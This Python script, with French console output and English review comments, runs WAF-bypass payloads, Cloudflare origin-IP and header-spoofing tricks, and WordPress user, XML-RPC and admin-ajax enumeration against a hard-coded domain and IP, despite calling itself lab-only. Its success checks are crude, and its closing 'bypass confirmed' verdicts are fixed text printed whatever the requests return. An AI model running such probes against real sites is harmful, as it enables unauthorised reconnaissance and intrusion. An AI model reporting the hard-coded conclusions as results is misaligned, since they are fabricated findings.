#!/usr/bin/env python3
"""
WAF Bypass Detailed Demonstration - Educational Lab Only
"""
import requests
import time
import random
import string
import base64
import urllib.parse
def demonstrate_waf_bypass() -> None:
    """Show exactly how WAF bypass works.

    Sends a series of GET requests to the hard-coded ``target`` with
    different values of the ``url=`` query parameter and prints the HTTP
    status, body length and a verdict for each. Nothing is returned; every
    result goes to stdout. Request failures are printed and otherwise
    ignored.
    """
    print("🔥 DÉMONSTRATION DÉTAILLÉE DU BYPASS WAF")
    print("=" * 60)
    # Hard-coded target; every request in this function goes to this host.
    target = "https://secure-azalai.azalai.com/www"
    # STEP 1: plain request (expected to be blocked)
    print("\n📌 ÉTAPE 1: Requête normale (généralement bloquée)")
    normal_payload = "admin"
    normal_url = f"{target}?url={normal_payload}"
    try:
        # verify=False disables TLS certificate validation for this request.
        response = requests.get(normal_url, timeout=10, verify=False)
        print(f" URL: {normal_url}")
        print(f" Status: {response.status_code}")
        print(f" Length: {len(response.text)}")
        # Baseline verdict is based on the status code only.
        print(f" Résultat: {'✅ Succès' if response.status_code == 200 else '❌ Bloqué'}")
    except Exception as e:
        print(f" Erreur: {str(e)}")
    # STEP 2: same request with a trailing %00 in the parameter value
    print("\n📌 ÉTAPE 2: Bypass avec null byte (%00)")
    bypass_payload = "admin%00"
    bypass_url = f"{target}?url={bypass_payload}"
    try:
        response = requests.get(bypass_url, timeout=10, verify=False)
        print(f" URL: {bypass_url}")
        print(f" Status: {response.status_code}")
        print(f" Length: {len(response.text)}")
        # NOTE(review): "bypass" here means only that the body is longer than
        # 1000 characters. The status code is not checked and the step-1
        # baseline is never compared against, so a block page longer than
        # 1000 characters would be reported as a success.
        print(f" Résultat: {'✅ BYPASS RÉUSSI!' if len(response.text) > 1000 else '❌ Échec'}")
        if len(response.text) > 1000:
            print(f" 🚨 BYPASS CONFIRMÉ!")
            # The line below claims the response differs from the baseline,
            # but no comparison with the step-1 response is made.
            print(f" 📊 Réponse différente de la normale")
            # Inspect the body: case-insensitive substring checks only, so any
            # page that mentions these words (e.g. a login form) matches.
            if 'admin' in response.text.lower():
                print(f" 🎯 Contenu 'admin' trouvé dans la réponse")
            if 'dashboard' in response.text.lower():
                print(f" 🎯 Contenu 'dashboard' trouvé dans la réponse")
            if 'login' in response.text.lower():
                print(f" 🎯 Contenu 'login' trouvé dans la réponse")
    except Exception as e:
        print(f" Erreur: {str(e)}")
    # STEP 3: printed explanation. These are fixed strings; nothing here is
    # derived from or checked against the responses observed above.
    print("\n📌 ÉTAPE 3: Explication technique du bypass")
    print(" 🔹 Le null byte (%00) termine prématurément les chaînes")
    print(" 🔹 Le WAF voit 'admin%00' comme 'admin' (valide)")
    print(" 🔹 L'application web voit 'admin' (ignore le %00)")
    print(" 🔹 Crée une incohérence entre WAF et application")
    # STEP 4: other encodings of the same parameter value
    print("\n📌 ÉTAPE 4: Autres techniques de bypass testées")
    # (label, raw value substituted into the query string) pairs.
    bypass_techniques = [
        ("Double encoding", "admin%2520"),
        ("Unicode encoding", "admin%u0020"),
        ("Tab character", "admin%09"),
        ("Newline character", "admin%0a"),
        ("Carriage return", "admin%0d"),
        ("Space alternative", "admin+"),
        ("Comment injection", "admin/**/"),
        ("Case variation", "ADMIN"),
        ("Concaténation", "adm'+'in"),
    ]
    for technique, payload in bypass_techniques:
        test_url = f"{target}?url={payload}"
        try:
            response = requests.get(test_url, timeout=5, verify=False)
            # Same length heuristic as step 2, this time combined with a 200.
            success = len(response.text) > 1000 and response.status_code == 200
            print(f" {technique:20} : {'✅' if success else '❌'} ({payload})")
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit and
            # hides the reason for the failure.
            print(f" {technique:20} : ❌ Erreur ({payload})")
def demonstrate_cloudflare_bypass() -> None:
    """Show CloudFlare bypass techniques.

    Issues GET requests against the hard-coded domain and IP address using
    three approaches (direct IP, client-supplied headers, guessed
    subdomains) and prints a verdict for each. Returns nothing; request
    failures are printed or silently skipped.
    """
    print("\n🔥 DÉMONSTRATION BYPASS CLOUDFLARE")
    print("=" * 40)
    # Hard-coded domain and IP. The script assumes, and never verifies, that
    # the IP is the origin host behind the CDN.
    target_domain = "secure-azalai.azalai.com"
    target_ip = "164.132.235.17"
    # Technique 1: request the IP address directly instead of the domain name
    print("\n📌 Technique 1: Accès IP direct")
    ip_url = f"https://{target_ip}/www"
    try:
        # verify=False: certificate validation is off, presumably because a
        # certificate issued for the domain would not match the bare IP.
        response = requests.get(ip_url, timeout=10, verify=False)
        print(f" URL: {ip_url}")
        print(f" Status: {response.status_code}")
        print(f" Server: {response.headers.get('Server', 'N/A')}")
        # NOTE(review): the verdict only checks that the word 'cloudflare'
        # is absent from the body; an error page from any other host would
        # also be reported as "BYPASS POSSIBLE".
        print(f" Résultat: {'✅ BYPASS POSSIBLE' if 'cloudflare' not in response.text.lower() else '❌ Toujours CloudFlare'}")
    except Exception as e:
        print(f" Erreur: {str(e)}")
    # Technique 2: client-supplied headers imitating a Googlebot crawler
    print("\n📌 Technique 2: Headers de contournement")
    # Every header here is chosen by the client. From the server side, this is
    # why X-Forwarded-For / X-Real-IP / CF-Connecting-IP must only be trusted
    # when a trusted proxy in front of the application overwrites them.
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
        'X-Forwarded-For': '66.249.66.1',  # Google IP
        'X-Real-IP': '66.249.66.1',
        'CF-Connecting-IP': '66.249.66.1',
        'CF-IPCountry': 'US',
        'CF-Ray': 'fake-ray-id'
    }
    try:
        response = requests.get(f"https://{target_domain}/www", headers=headers, timeout=10, verify=False)
        print(f" Headers: Googlebot simulation")
        print(f" Status: {response.status_code}")
        # Verdict is a 200 status only; the body is not inspected.
        print(f" Résultat: {'✅ BYPASS POSSIBLE' if response.status_code == 200 else '❌ Bloqué'}")
    except Exception as e:
        print(f" Erreur: {str(e)}")
    # Technique 3: try a short list of guessed subdomains
    print("\n📌 Technique 3: Subdomain bypass")
    subdomains = [
        f"direct.{target_domain}",
        f"origin.{target_domain}",
        f"cdn.{target_domain}",
        f"api.{target_domain}",
        f"admin.{target_domain}"
    ]
    for subdomain in subdomains:
        try:
            response = requests.get(f"https://{subdomain}/www", timeout=5, verify=False)
            # NOTE(review): any 200 is reported as a bypass, even if the
            # subdomain resolves to the same CDN-fronted site; the response
            # is not compared with the one from the main domain.
            if response.status_code == 200:
                print(f" ✅ {subdomain} : BYPASS POSSIBLE")
                break
        except:
            # Bare except: DNS and connection failures are skipped silently
            # (this also swallows KeyboardInterrupt).
            continue
    else:
        # for/else: runs only when no subdomain triggered the break above.
        print(" ❌ Aucun bypass subdomain trouvé")
def demonstrate_wordpress_bypass() -> None:
    """Show WordPress-specific bypass techniques.

    Probes the hard-coded target for the WordPress REST API, the XML-RPC
    endpoint and admin-ajax.php and prints whether each one responded.
    Returns nothing. Every request failure is reported as "Erreur" with the
    exception message discarded.
    """
    print("\n🔥 DÉMONSTRATION BYPASS WORDPRESS")
    print("=" * 40)
    # Hard-coded target; the endpoint paths below are appended to it.
    target = "https://secure-azalai.azalai.com/www"
    # Technique 1: REST API endpoints
    print("\n📌 Technique 1: WordPress REST API")
    rest_endpoints = [
        "/wp-json/wp/v2/users",
        "/wp-json/wp/v2/posts",
        "/wp-json/wp/v2/pages",
        "/wp-json/",
        "/?rest_route=/wp/v2/users"
    ]
    for endpoint in rest_endpoints:
        try:
            url = f"{target}{endpoint}"
            # verify=False disables TLS certificate validation.
            response = requests.get(url, timeout=5, verify=False)
            # "Success" = 200 with a body over 100 characters. The body is not
            # parsed as JSON, so an HTML page would also pass this check.
            if response.status_code == 200 and len(response.text) > 100:
                print(f" ✅ {endpoint} : ACCÈS RÉUSSI")
                # Substring match only: any occurrence of "admin" in the body,
                # not necessarily a user record, triggers this line.
                if 'admin' in response.text.lower():
                    print(f" 🎯 Utilisateur 'admin' détecté!")
            else:
                print(f" ❌ {endpoint} : Bloqué ({response.status_code})")
        except Exception as e:
            # `e` is caught but never printed, so the failure cause is lost.
            print(f" ❌ {endpoint} : Erreur")
    # Technique 2: XML-RPC system.listMethods
    print("\n📌 Technique 2: XML-RPC methods")
    # Request body for system.listMethods; the call takes no parameters.
    xmlrpc_payload = """<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>"""
    try:
        response = requests.post(f"{target}/xmlrpc.php",
                                 data=xmlrpc_payload,
                                 headers={'Content-Type': 'application/xml'},
                                 timeout=10, verify=False)
        if response.status_code == 200 and 'methodResponse' in response.text:
            print(f" ✅ XML-RPC : ACCÈS RÉUSSI")
            # Count the available methods. Crude: counts '<value><string>'
            # tags in the raw text instead of parsing the XML.
            method_count = response.text.count('<value><string>')
            print(f" 📊 {method_count} méthodes disponibles")
            # Check for the methods the script labels as dangerous.
            # NOTE(review): being listed by system.listMethods does not show
            # that a method is callable without valid credentials — confirm
            # before reporting this as a finding.
            dangerous_methods = ['wp.getUsersBlogs', 'wp.getCategories', 'wp.getOptions']
            for method in dangerous_methods:
                if method in response.text:
                    print(f" ⚠️ Méthode dangereuse: {method}")
        else:
            print(f" ❌ XML-RPC : Bloqué")
    except Exception as e:
        # Exception message discarded.
        print(f" ❌ XML-RPC : Erreur")
    # Technique 3: admin-ajax.php actions
    print("\n📌 Technique 3: Admin Ajax bypass")
    # Form-encoded POST bodies; each carries only an `action` name.
    ajax_payloads = [
        {'action': 'heartbeat'},
        {'action': 'get_attachment'},
        {'action': 'query-attachments'},
        {'action': 'wp_get_attachment_url'},
        {'action': 'wp_maybe_generate_attachment_metadata'}
    ]
    for payload in ajax_payloads:
        try:
            response = requests.post(f"{target}/wp-admin/admin-ajax.php",
                                     data=payload,
                                     timeout=5, verify=False)
            # "Success" = 200 with more than 10 characters in the body; any
            # longer reply, including an error page, passes this check.
            if response.status_code == 200 and len(response.text) > 10:
                print(f" ✅ Admin Ajax ({payload['action']}) : ACCÈS RÉUSSI")
                # Substring match on the raw body, not on a parsed JSON field.
                if 'success' in response.text:
                    print(f" 🎯 Réponse succès détectée!")
            else:
                print(f" ❌ Admin Ajax ({payload['action']}) : Bloqué")
        except Exception as e:
            # Exception message discarded.
            print(f" ❌ Admin Ajax ({payload['action']}) : Erreur")
def main() -> None:
    """Run the three demonstrations, then print a fixed summary.

    NOTE(review): the "CONCLUSION", "RISQUES" and "RECOMMANDATIONS" sections
    below are hard-coded strings. They are printed unchanged regardless of
    what the demonstrate_* functions observed, because those functions
    return nothing and only print their own results.
    """
    print("🔥 DÉMONSTRATION COMPLÈTE DU CONTOURNEMENT DES PROTECTIONS")
    print("=" * 70)
    print("Ce script montre EXACTEMENT comment les protections sont contournées")
    print("Uniquement à des fins éducatives dans votre environnement lab autorisé")
    print("=" * 70)
    # Run each demonstration in turn; each prints its own results to stdout.
    demonstrate_waf_bypass()
    demonstrate_cloudflare_bypass()
    demonstrate_wordpress_bypass()
    print("\n" + "=" * 70)
    # Fixed verdicts — not computed from the runs above.
    print("🎯 CONCLUSION DU BYPASS")
    print("=" * 70)
    print("✅ BYPASS WAF CONFIRMÉ : Null byte (%00) fonctionne")
    print("✅ BYPASS WORDPRESS : XML-RPC et endpoints accessibles")
    print("✅ BYPASS PARTIEL : Certaines protections contournables")
    print("❌ LIMITATIONS : Protections multicouches efficaces")
    # Fixed risk list.
    print("\n📋 RISQUES IDENTIFIÉS :")
    print(" • Reconnaissance complète possible")
    print(" • Énumération des fonctionnalités WordPress")
    print(" • Accès aux informations de structure")
    print(" • Bypass partiel des protections")
    # Fixed recommendation list.
    print("\n🛡️ RECOMMANDATIONS :")
    print(" • Mise à jour WordPress urgente")
    print(" • Configuration WAF avancée")
    print(" • Désactivation XML-RPC si non utilisé")
    print(" • Monitoring des tentatives de bypass")
# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()